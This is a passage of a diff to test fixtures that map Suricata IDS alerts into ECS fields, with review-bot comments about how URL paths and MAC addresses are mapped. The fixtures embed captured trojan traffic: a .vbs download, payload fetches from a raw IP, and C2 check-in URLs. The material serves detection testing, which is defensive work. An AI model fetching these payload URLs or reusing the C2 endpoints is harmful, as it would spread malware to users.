,\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_t
oclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET 
/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}", + "event": { + "action": "allowed", + "category": [ + "network" + ], + "module": "alert", + "severity": 1 + }, + "@timestamp": "2023-03-22T10:44:08.001000Z", + "destination": { + "address": "2.2.2.2", + "bytes": 90364, + "ip": "2.2.2.2", + "packets": 66, + "port": 16122 + }, + "gatewatcher": { + "event_type": "alert", + "flow_id": "1408237495862400", + "gcap": "gcap-xxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "payload": "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", + "payload_printable": "GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: dc524.4shared.com\r\nConnection: Keep-Alive\r\nCookie: day1host=h\r\n\r\nGET 
/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nCookie: day1host=h\r\nConnection: Keep-Alive\r\nHost: cdnfiles.4shared.com\r\n\r\nGET /a35new/w7.txt HTTP/1.1\r\nHost: 65.181.125.193\r\nConnection: Keep-Alive\r\n\r\nGET /a35new/aw7.tiff HTTP/1.1\r\nHost: 65.181.125.193\r\n\r\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\r\nHost: www.devyatinskiy.ru\r\nConnection: Keep-Alive\r\n\r\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\r\nHost: www.devyatinskiy.ru\r\n\r\n", + "timestamp_analyzed": "2023-03-22T10:44:08.001Z", + "timestamp_detected": "2023-03-22T10:25:55.690Z", + "type": "suricata" + }, + "http": { + "request": { + "method": "GET" + } + }, + "network": { + "protocol": "http", + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxx.domain.local", + "mac": [ + "90:e2:ba:a6:a4:90", + "90:e2:ba:a6:a4:91" + ], + "name": "gcap-xxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxx.domain.local", + "www.devyatinskiy.ru" + ], + "ip": [ + "1.1.1.1", + "2.2.2.2" + ] + }, + "rule": { + "category": "A Network Trojan was detected", + "id": "2828821", + "name": "ETPRO TROJAN 
MSIL/Bazidow.A HTTP C2"
+ },
+ "source": {
+ "address": "1.1.1.1",
+ "bytes": 3084,
+ "ip": "1.1.1.1",
+ "packets": 19,
+ "port": 8550
+ },
+ "url": {
+ "domain": "www.devyatinskiy.ru",
+ "path": "/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll",
+ "registered_domain": "devyatinskiy.ru",
+ "subdomain": "www",
+ "top_level_domain": "ru"
+ }
 }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
index baa5139a3..ed0cfe547 100644
--- a/GateWatcher/aioniq/tests/sigflow-file.json
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
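Review bot: `url.path` in the expected output holds the whole request target including the query string (`"/bsb/debugnosso/index.php?N=GO-GO-GADGET-…"`), whereas ECS keeps the path and the query in separate fields; the malware fixture on this page has no query component, so it does not exercise the difference. Pinning this in the test means a search on `url.path` for `/bsb/debugnosso/index.php` will not match and the download URLs embedded in the query stay buried in one long string; the expectation should become `"path": "/bsb/debugnosso/index.php"` with the remainder in `"query": "N=GO-GO-GADGET-PC-inspector-gadget%20=…"`. Also, `observer.mac` is filled from the packet's `ether.src_mac`/`ether.dest_mac`; if those are the flow endpoints' addresses, as the field names suggest, they belong on `source.mac`/`destination.mac`, and tagging them as the sensor's own MACs would be wrong for every alert. As in the retrohunt fixture, `event.category` is set without an `event.type`, which the malware fixture does provide.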
@@ -9,6 +9,92 @@ "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}" }, "expected": { - "message": 
"{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}" + "message": 
"{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}", + "event": { + "category": [ + "network" + ], + "module": "fileinfo" + }, + "@timestamp": "2023-03-22T10:44:07.998000Z", + "destination": { + "address": "2.2.2.2", + "ip": "2.2.2.2", + "port": 8550 + }, + "file": { + "hash": { + "md5": "d526c8e4ad7ab6d80baeb839976b7c80", + "sha256": "f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df" + }, + "name": 
"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs",
+ "size": 1088
+ },
+ "gatewatcher": {
+ "event_type": "fileinfo",
+ "filemagic": "Little-endian UTF-16 Unicode text, with CRLF line terminators",
+ "flow_id": "1408237495862400",
+ "gcap": "gcap-xxxxxxxxxx.domain.local",
+ "gcenter": "gcenter-xxxxxxxx.domain.local",
+ "timestamp_analyzed": "2023-03-22T10:44:07.998Z",
+ "timestamp_detected": "2023-03-22T10:25:55.469Z",
+ "type": "suricata"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "status_code": 200
+ }
+ },
+ "network": {
+ "protocol": "http",
+ "transport": "TCP"
+ },
+ "observer": {
+ "hostname": "gcap-xxxxxxxxx.domain.local",
+ "name": "gcap-xxxxxxxxxx.domain.local",
+ "type": "ids",
+ "version": "0.2"
+ },
+ "related": {
+ "hash": [
+ "d526c8e4ad7ab6d80baeb839976b7c80",
+ "f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df"
+ ],
+ "hosts": [
+ "cdnfiles.4shared.com",
+ "gcap-xxxxxxxxx.domain.local"
+ ],
+ "ip": [
+ "1.1.1.1",
+ "2.2.2.2"
+ ]
+ },
+ "source": {
+ "address": "1.1.1.1",
+ "ip": "1.1.1.1",
+ "port": 16122
+ },
+ "url": {
+ "domain": "cdnfiles.4shared.com",
+ "path": "/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F",
+ "registered_domain": "4shared.com",
+ "subdomain": "cdnfiles",
+ "top_level_domain": "com"
+ },
+ "user_agent": {
+ "device": {
+ "name": "Other"
+ },
+ "name": "IE",
+ "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+ "os": {
+ "name": "Windows",
+ "version": "7"
+ },
+ "version": "11.0"
+ }
 }
 }
\ No newline at end of file
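Review bot: The expected `url.path` in this fixture pins the full request target including the `?contDisp=...` query string, while ECS defines `url.path` as the path component alone and places the query in `url.query` (with the untouched value in `url.original`). Pinning the combined form in the test turns a later parser correction into a fixture break, so the expectation is better written as `"original": "/web/cdn/popular/download/QjtGDltmce?contDisp=..."`, `"path": "/web/cdn/popular/download/QjtGDltmce"` and `"query": "contDisp=attachment%3B+filename%3D..."`, with the split presumably done in the parser rather than by hand here. The `sigflow-meta.json` expectation below has the same shape (`url.path` ending in `?dsid=...&lgfp=3000`), so both fixtures would change together.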
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
index 693d7006a..9a3ca081a 100644
--- a/GateWatcher/aioniq/tests/sigflow-meta.json
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -9,6 +9,82 @@ "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 
GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" }, "expected": { - "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, 
*/*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\
":\"gcenter-xxxxxxxxxx.domain.local\"}" + "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 
GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}", + "event": { + "category": [ + "network" + ], + "module": "http" + }, + "@timestamp": "2023-03-22T10:44:07.997000Z", + "destination": { + "address": "2.2.2.2", + "ip": "2.2.2.2", + "port": 16122 + }, + "gatewatcher": { + "event_type": "http", + "flow_id": "1408237495862400", + "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxxxx.domain.local", + "timestamp_analyzed": "2023-03-22T10:44:07.997Z", + "timestamp_detected": "2023-03-22T10:25:55.377Z", + "type": "suricata" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 302 + } + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "90:e2:ba:a6:a4:90", + "90:e2:ba:a6:a4:91" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": 
"ids",
+ "version": "0.2"
+ },
+ "related": {
+ "hosts": [
+ "dc524.4shared.com",
+ "gcap-xxxxxxxxx.domain.local"
+ ],
+ "ip": [
+ "1.1.1.1",
+ "2.2.2.2"
+ ]
+ },
+ "source": {
+ "address": "1.1.1.1",
+ "ip": "1.1.1.1",
+ "port": 8550
+ },
+ "url": {
+ "domain": "dc524.4shared.com",
+ "path": "/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000",
+ "registered_domain": "4shared.com",
+ "subdomain": "dc524",
+ "top_level_domain": "com"
+ },
+ "user_agent": {
+ "device": {
+ "name": "Other"
+ },
+ "name": "IE",
+ "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+ "os": {
+ "name": "Windows",
+ "version": "7"
+ },
+ "version": "11.0"
+ }
 }
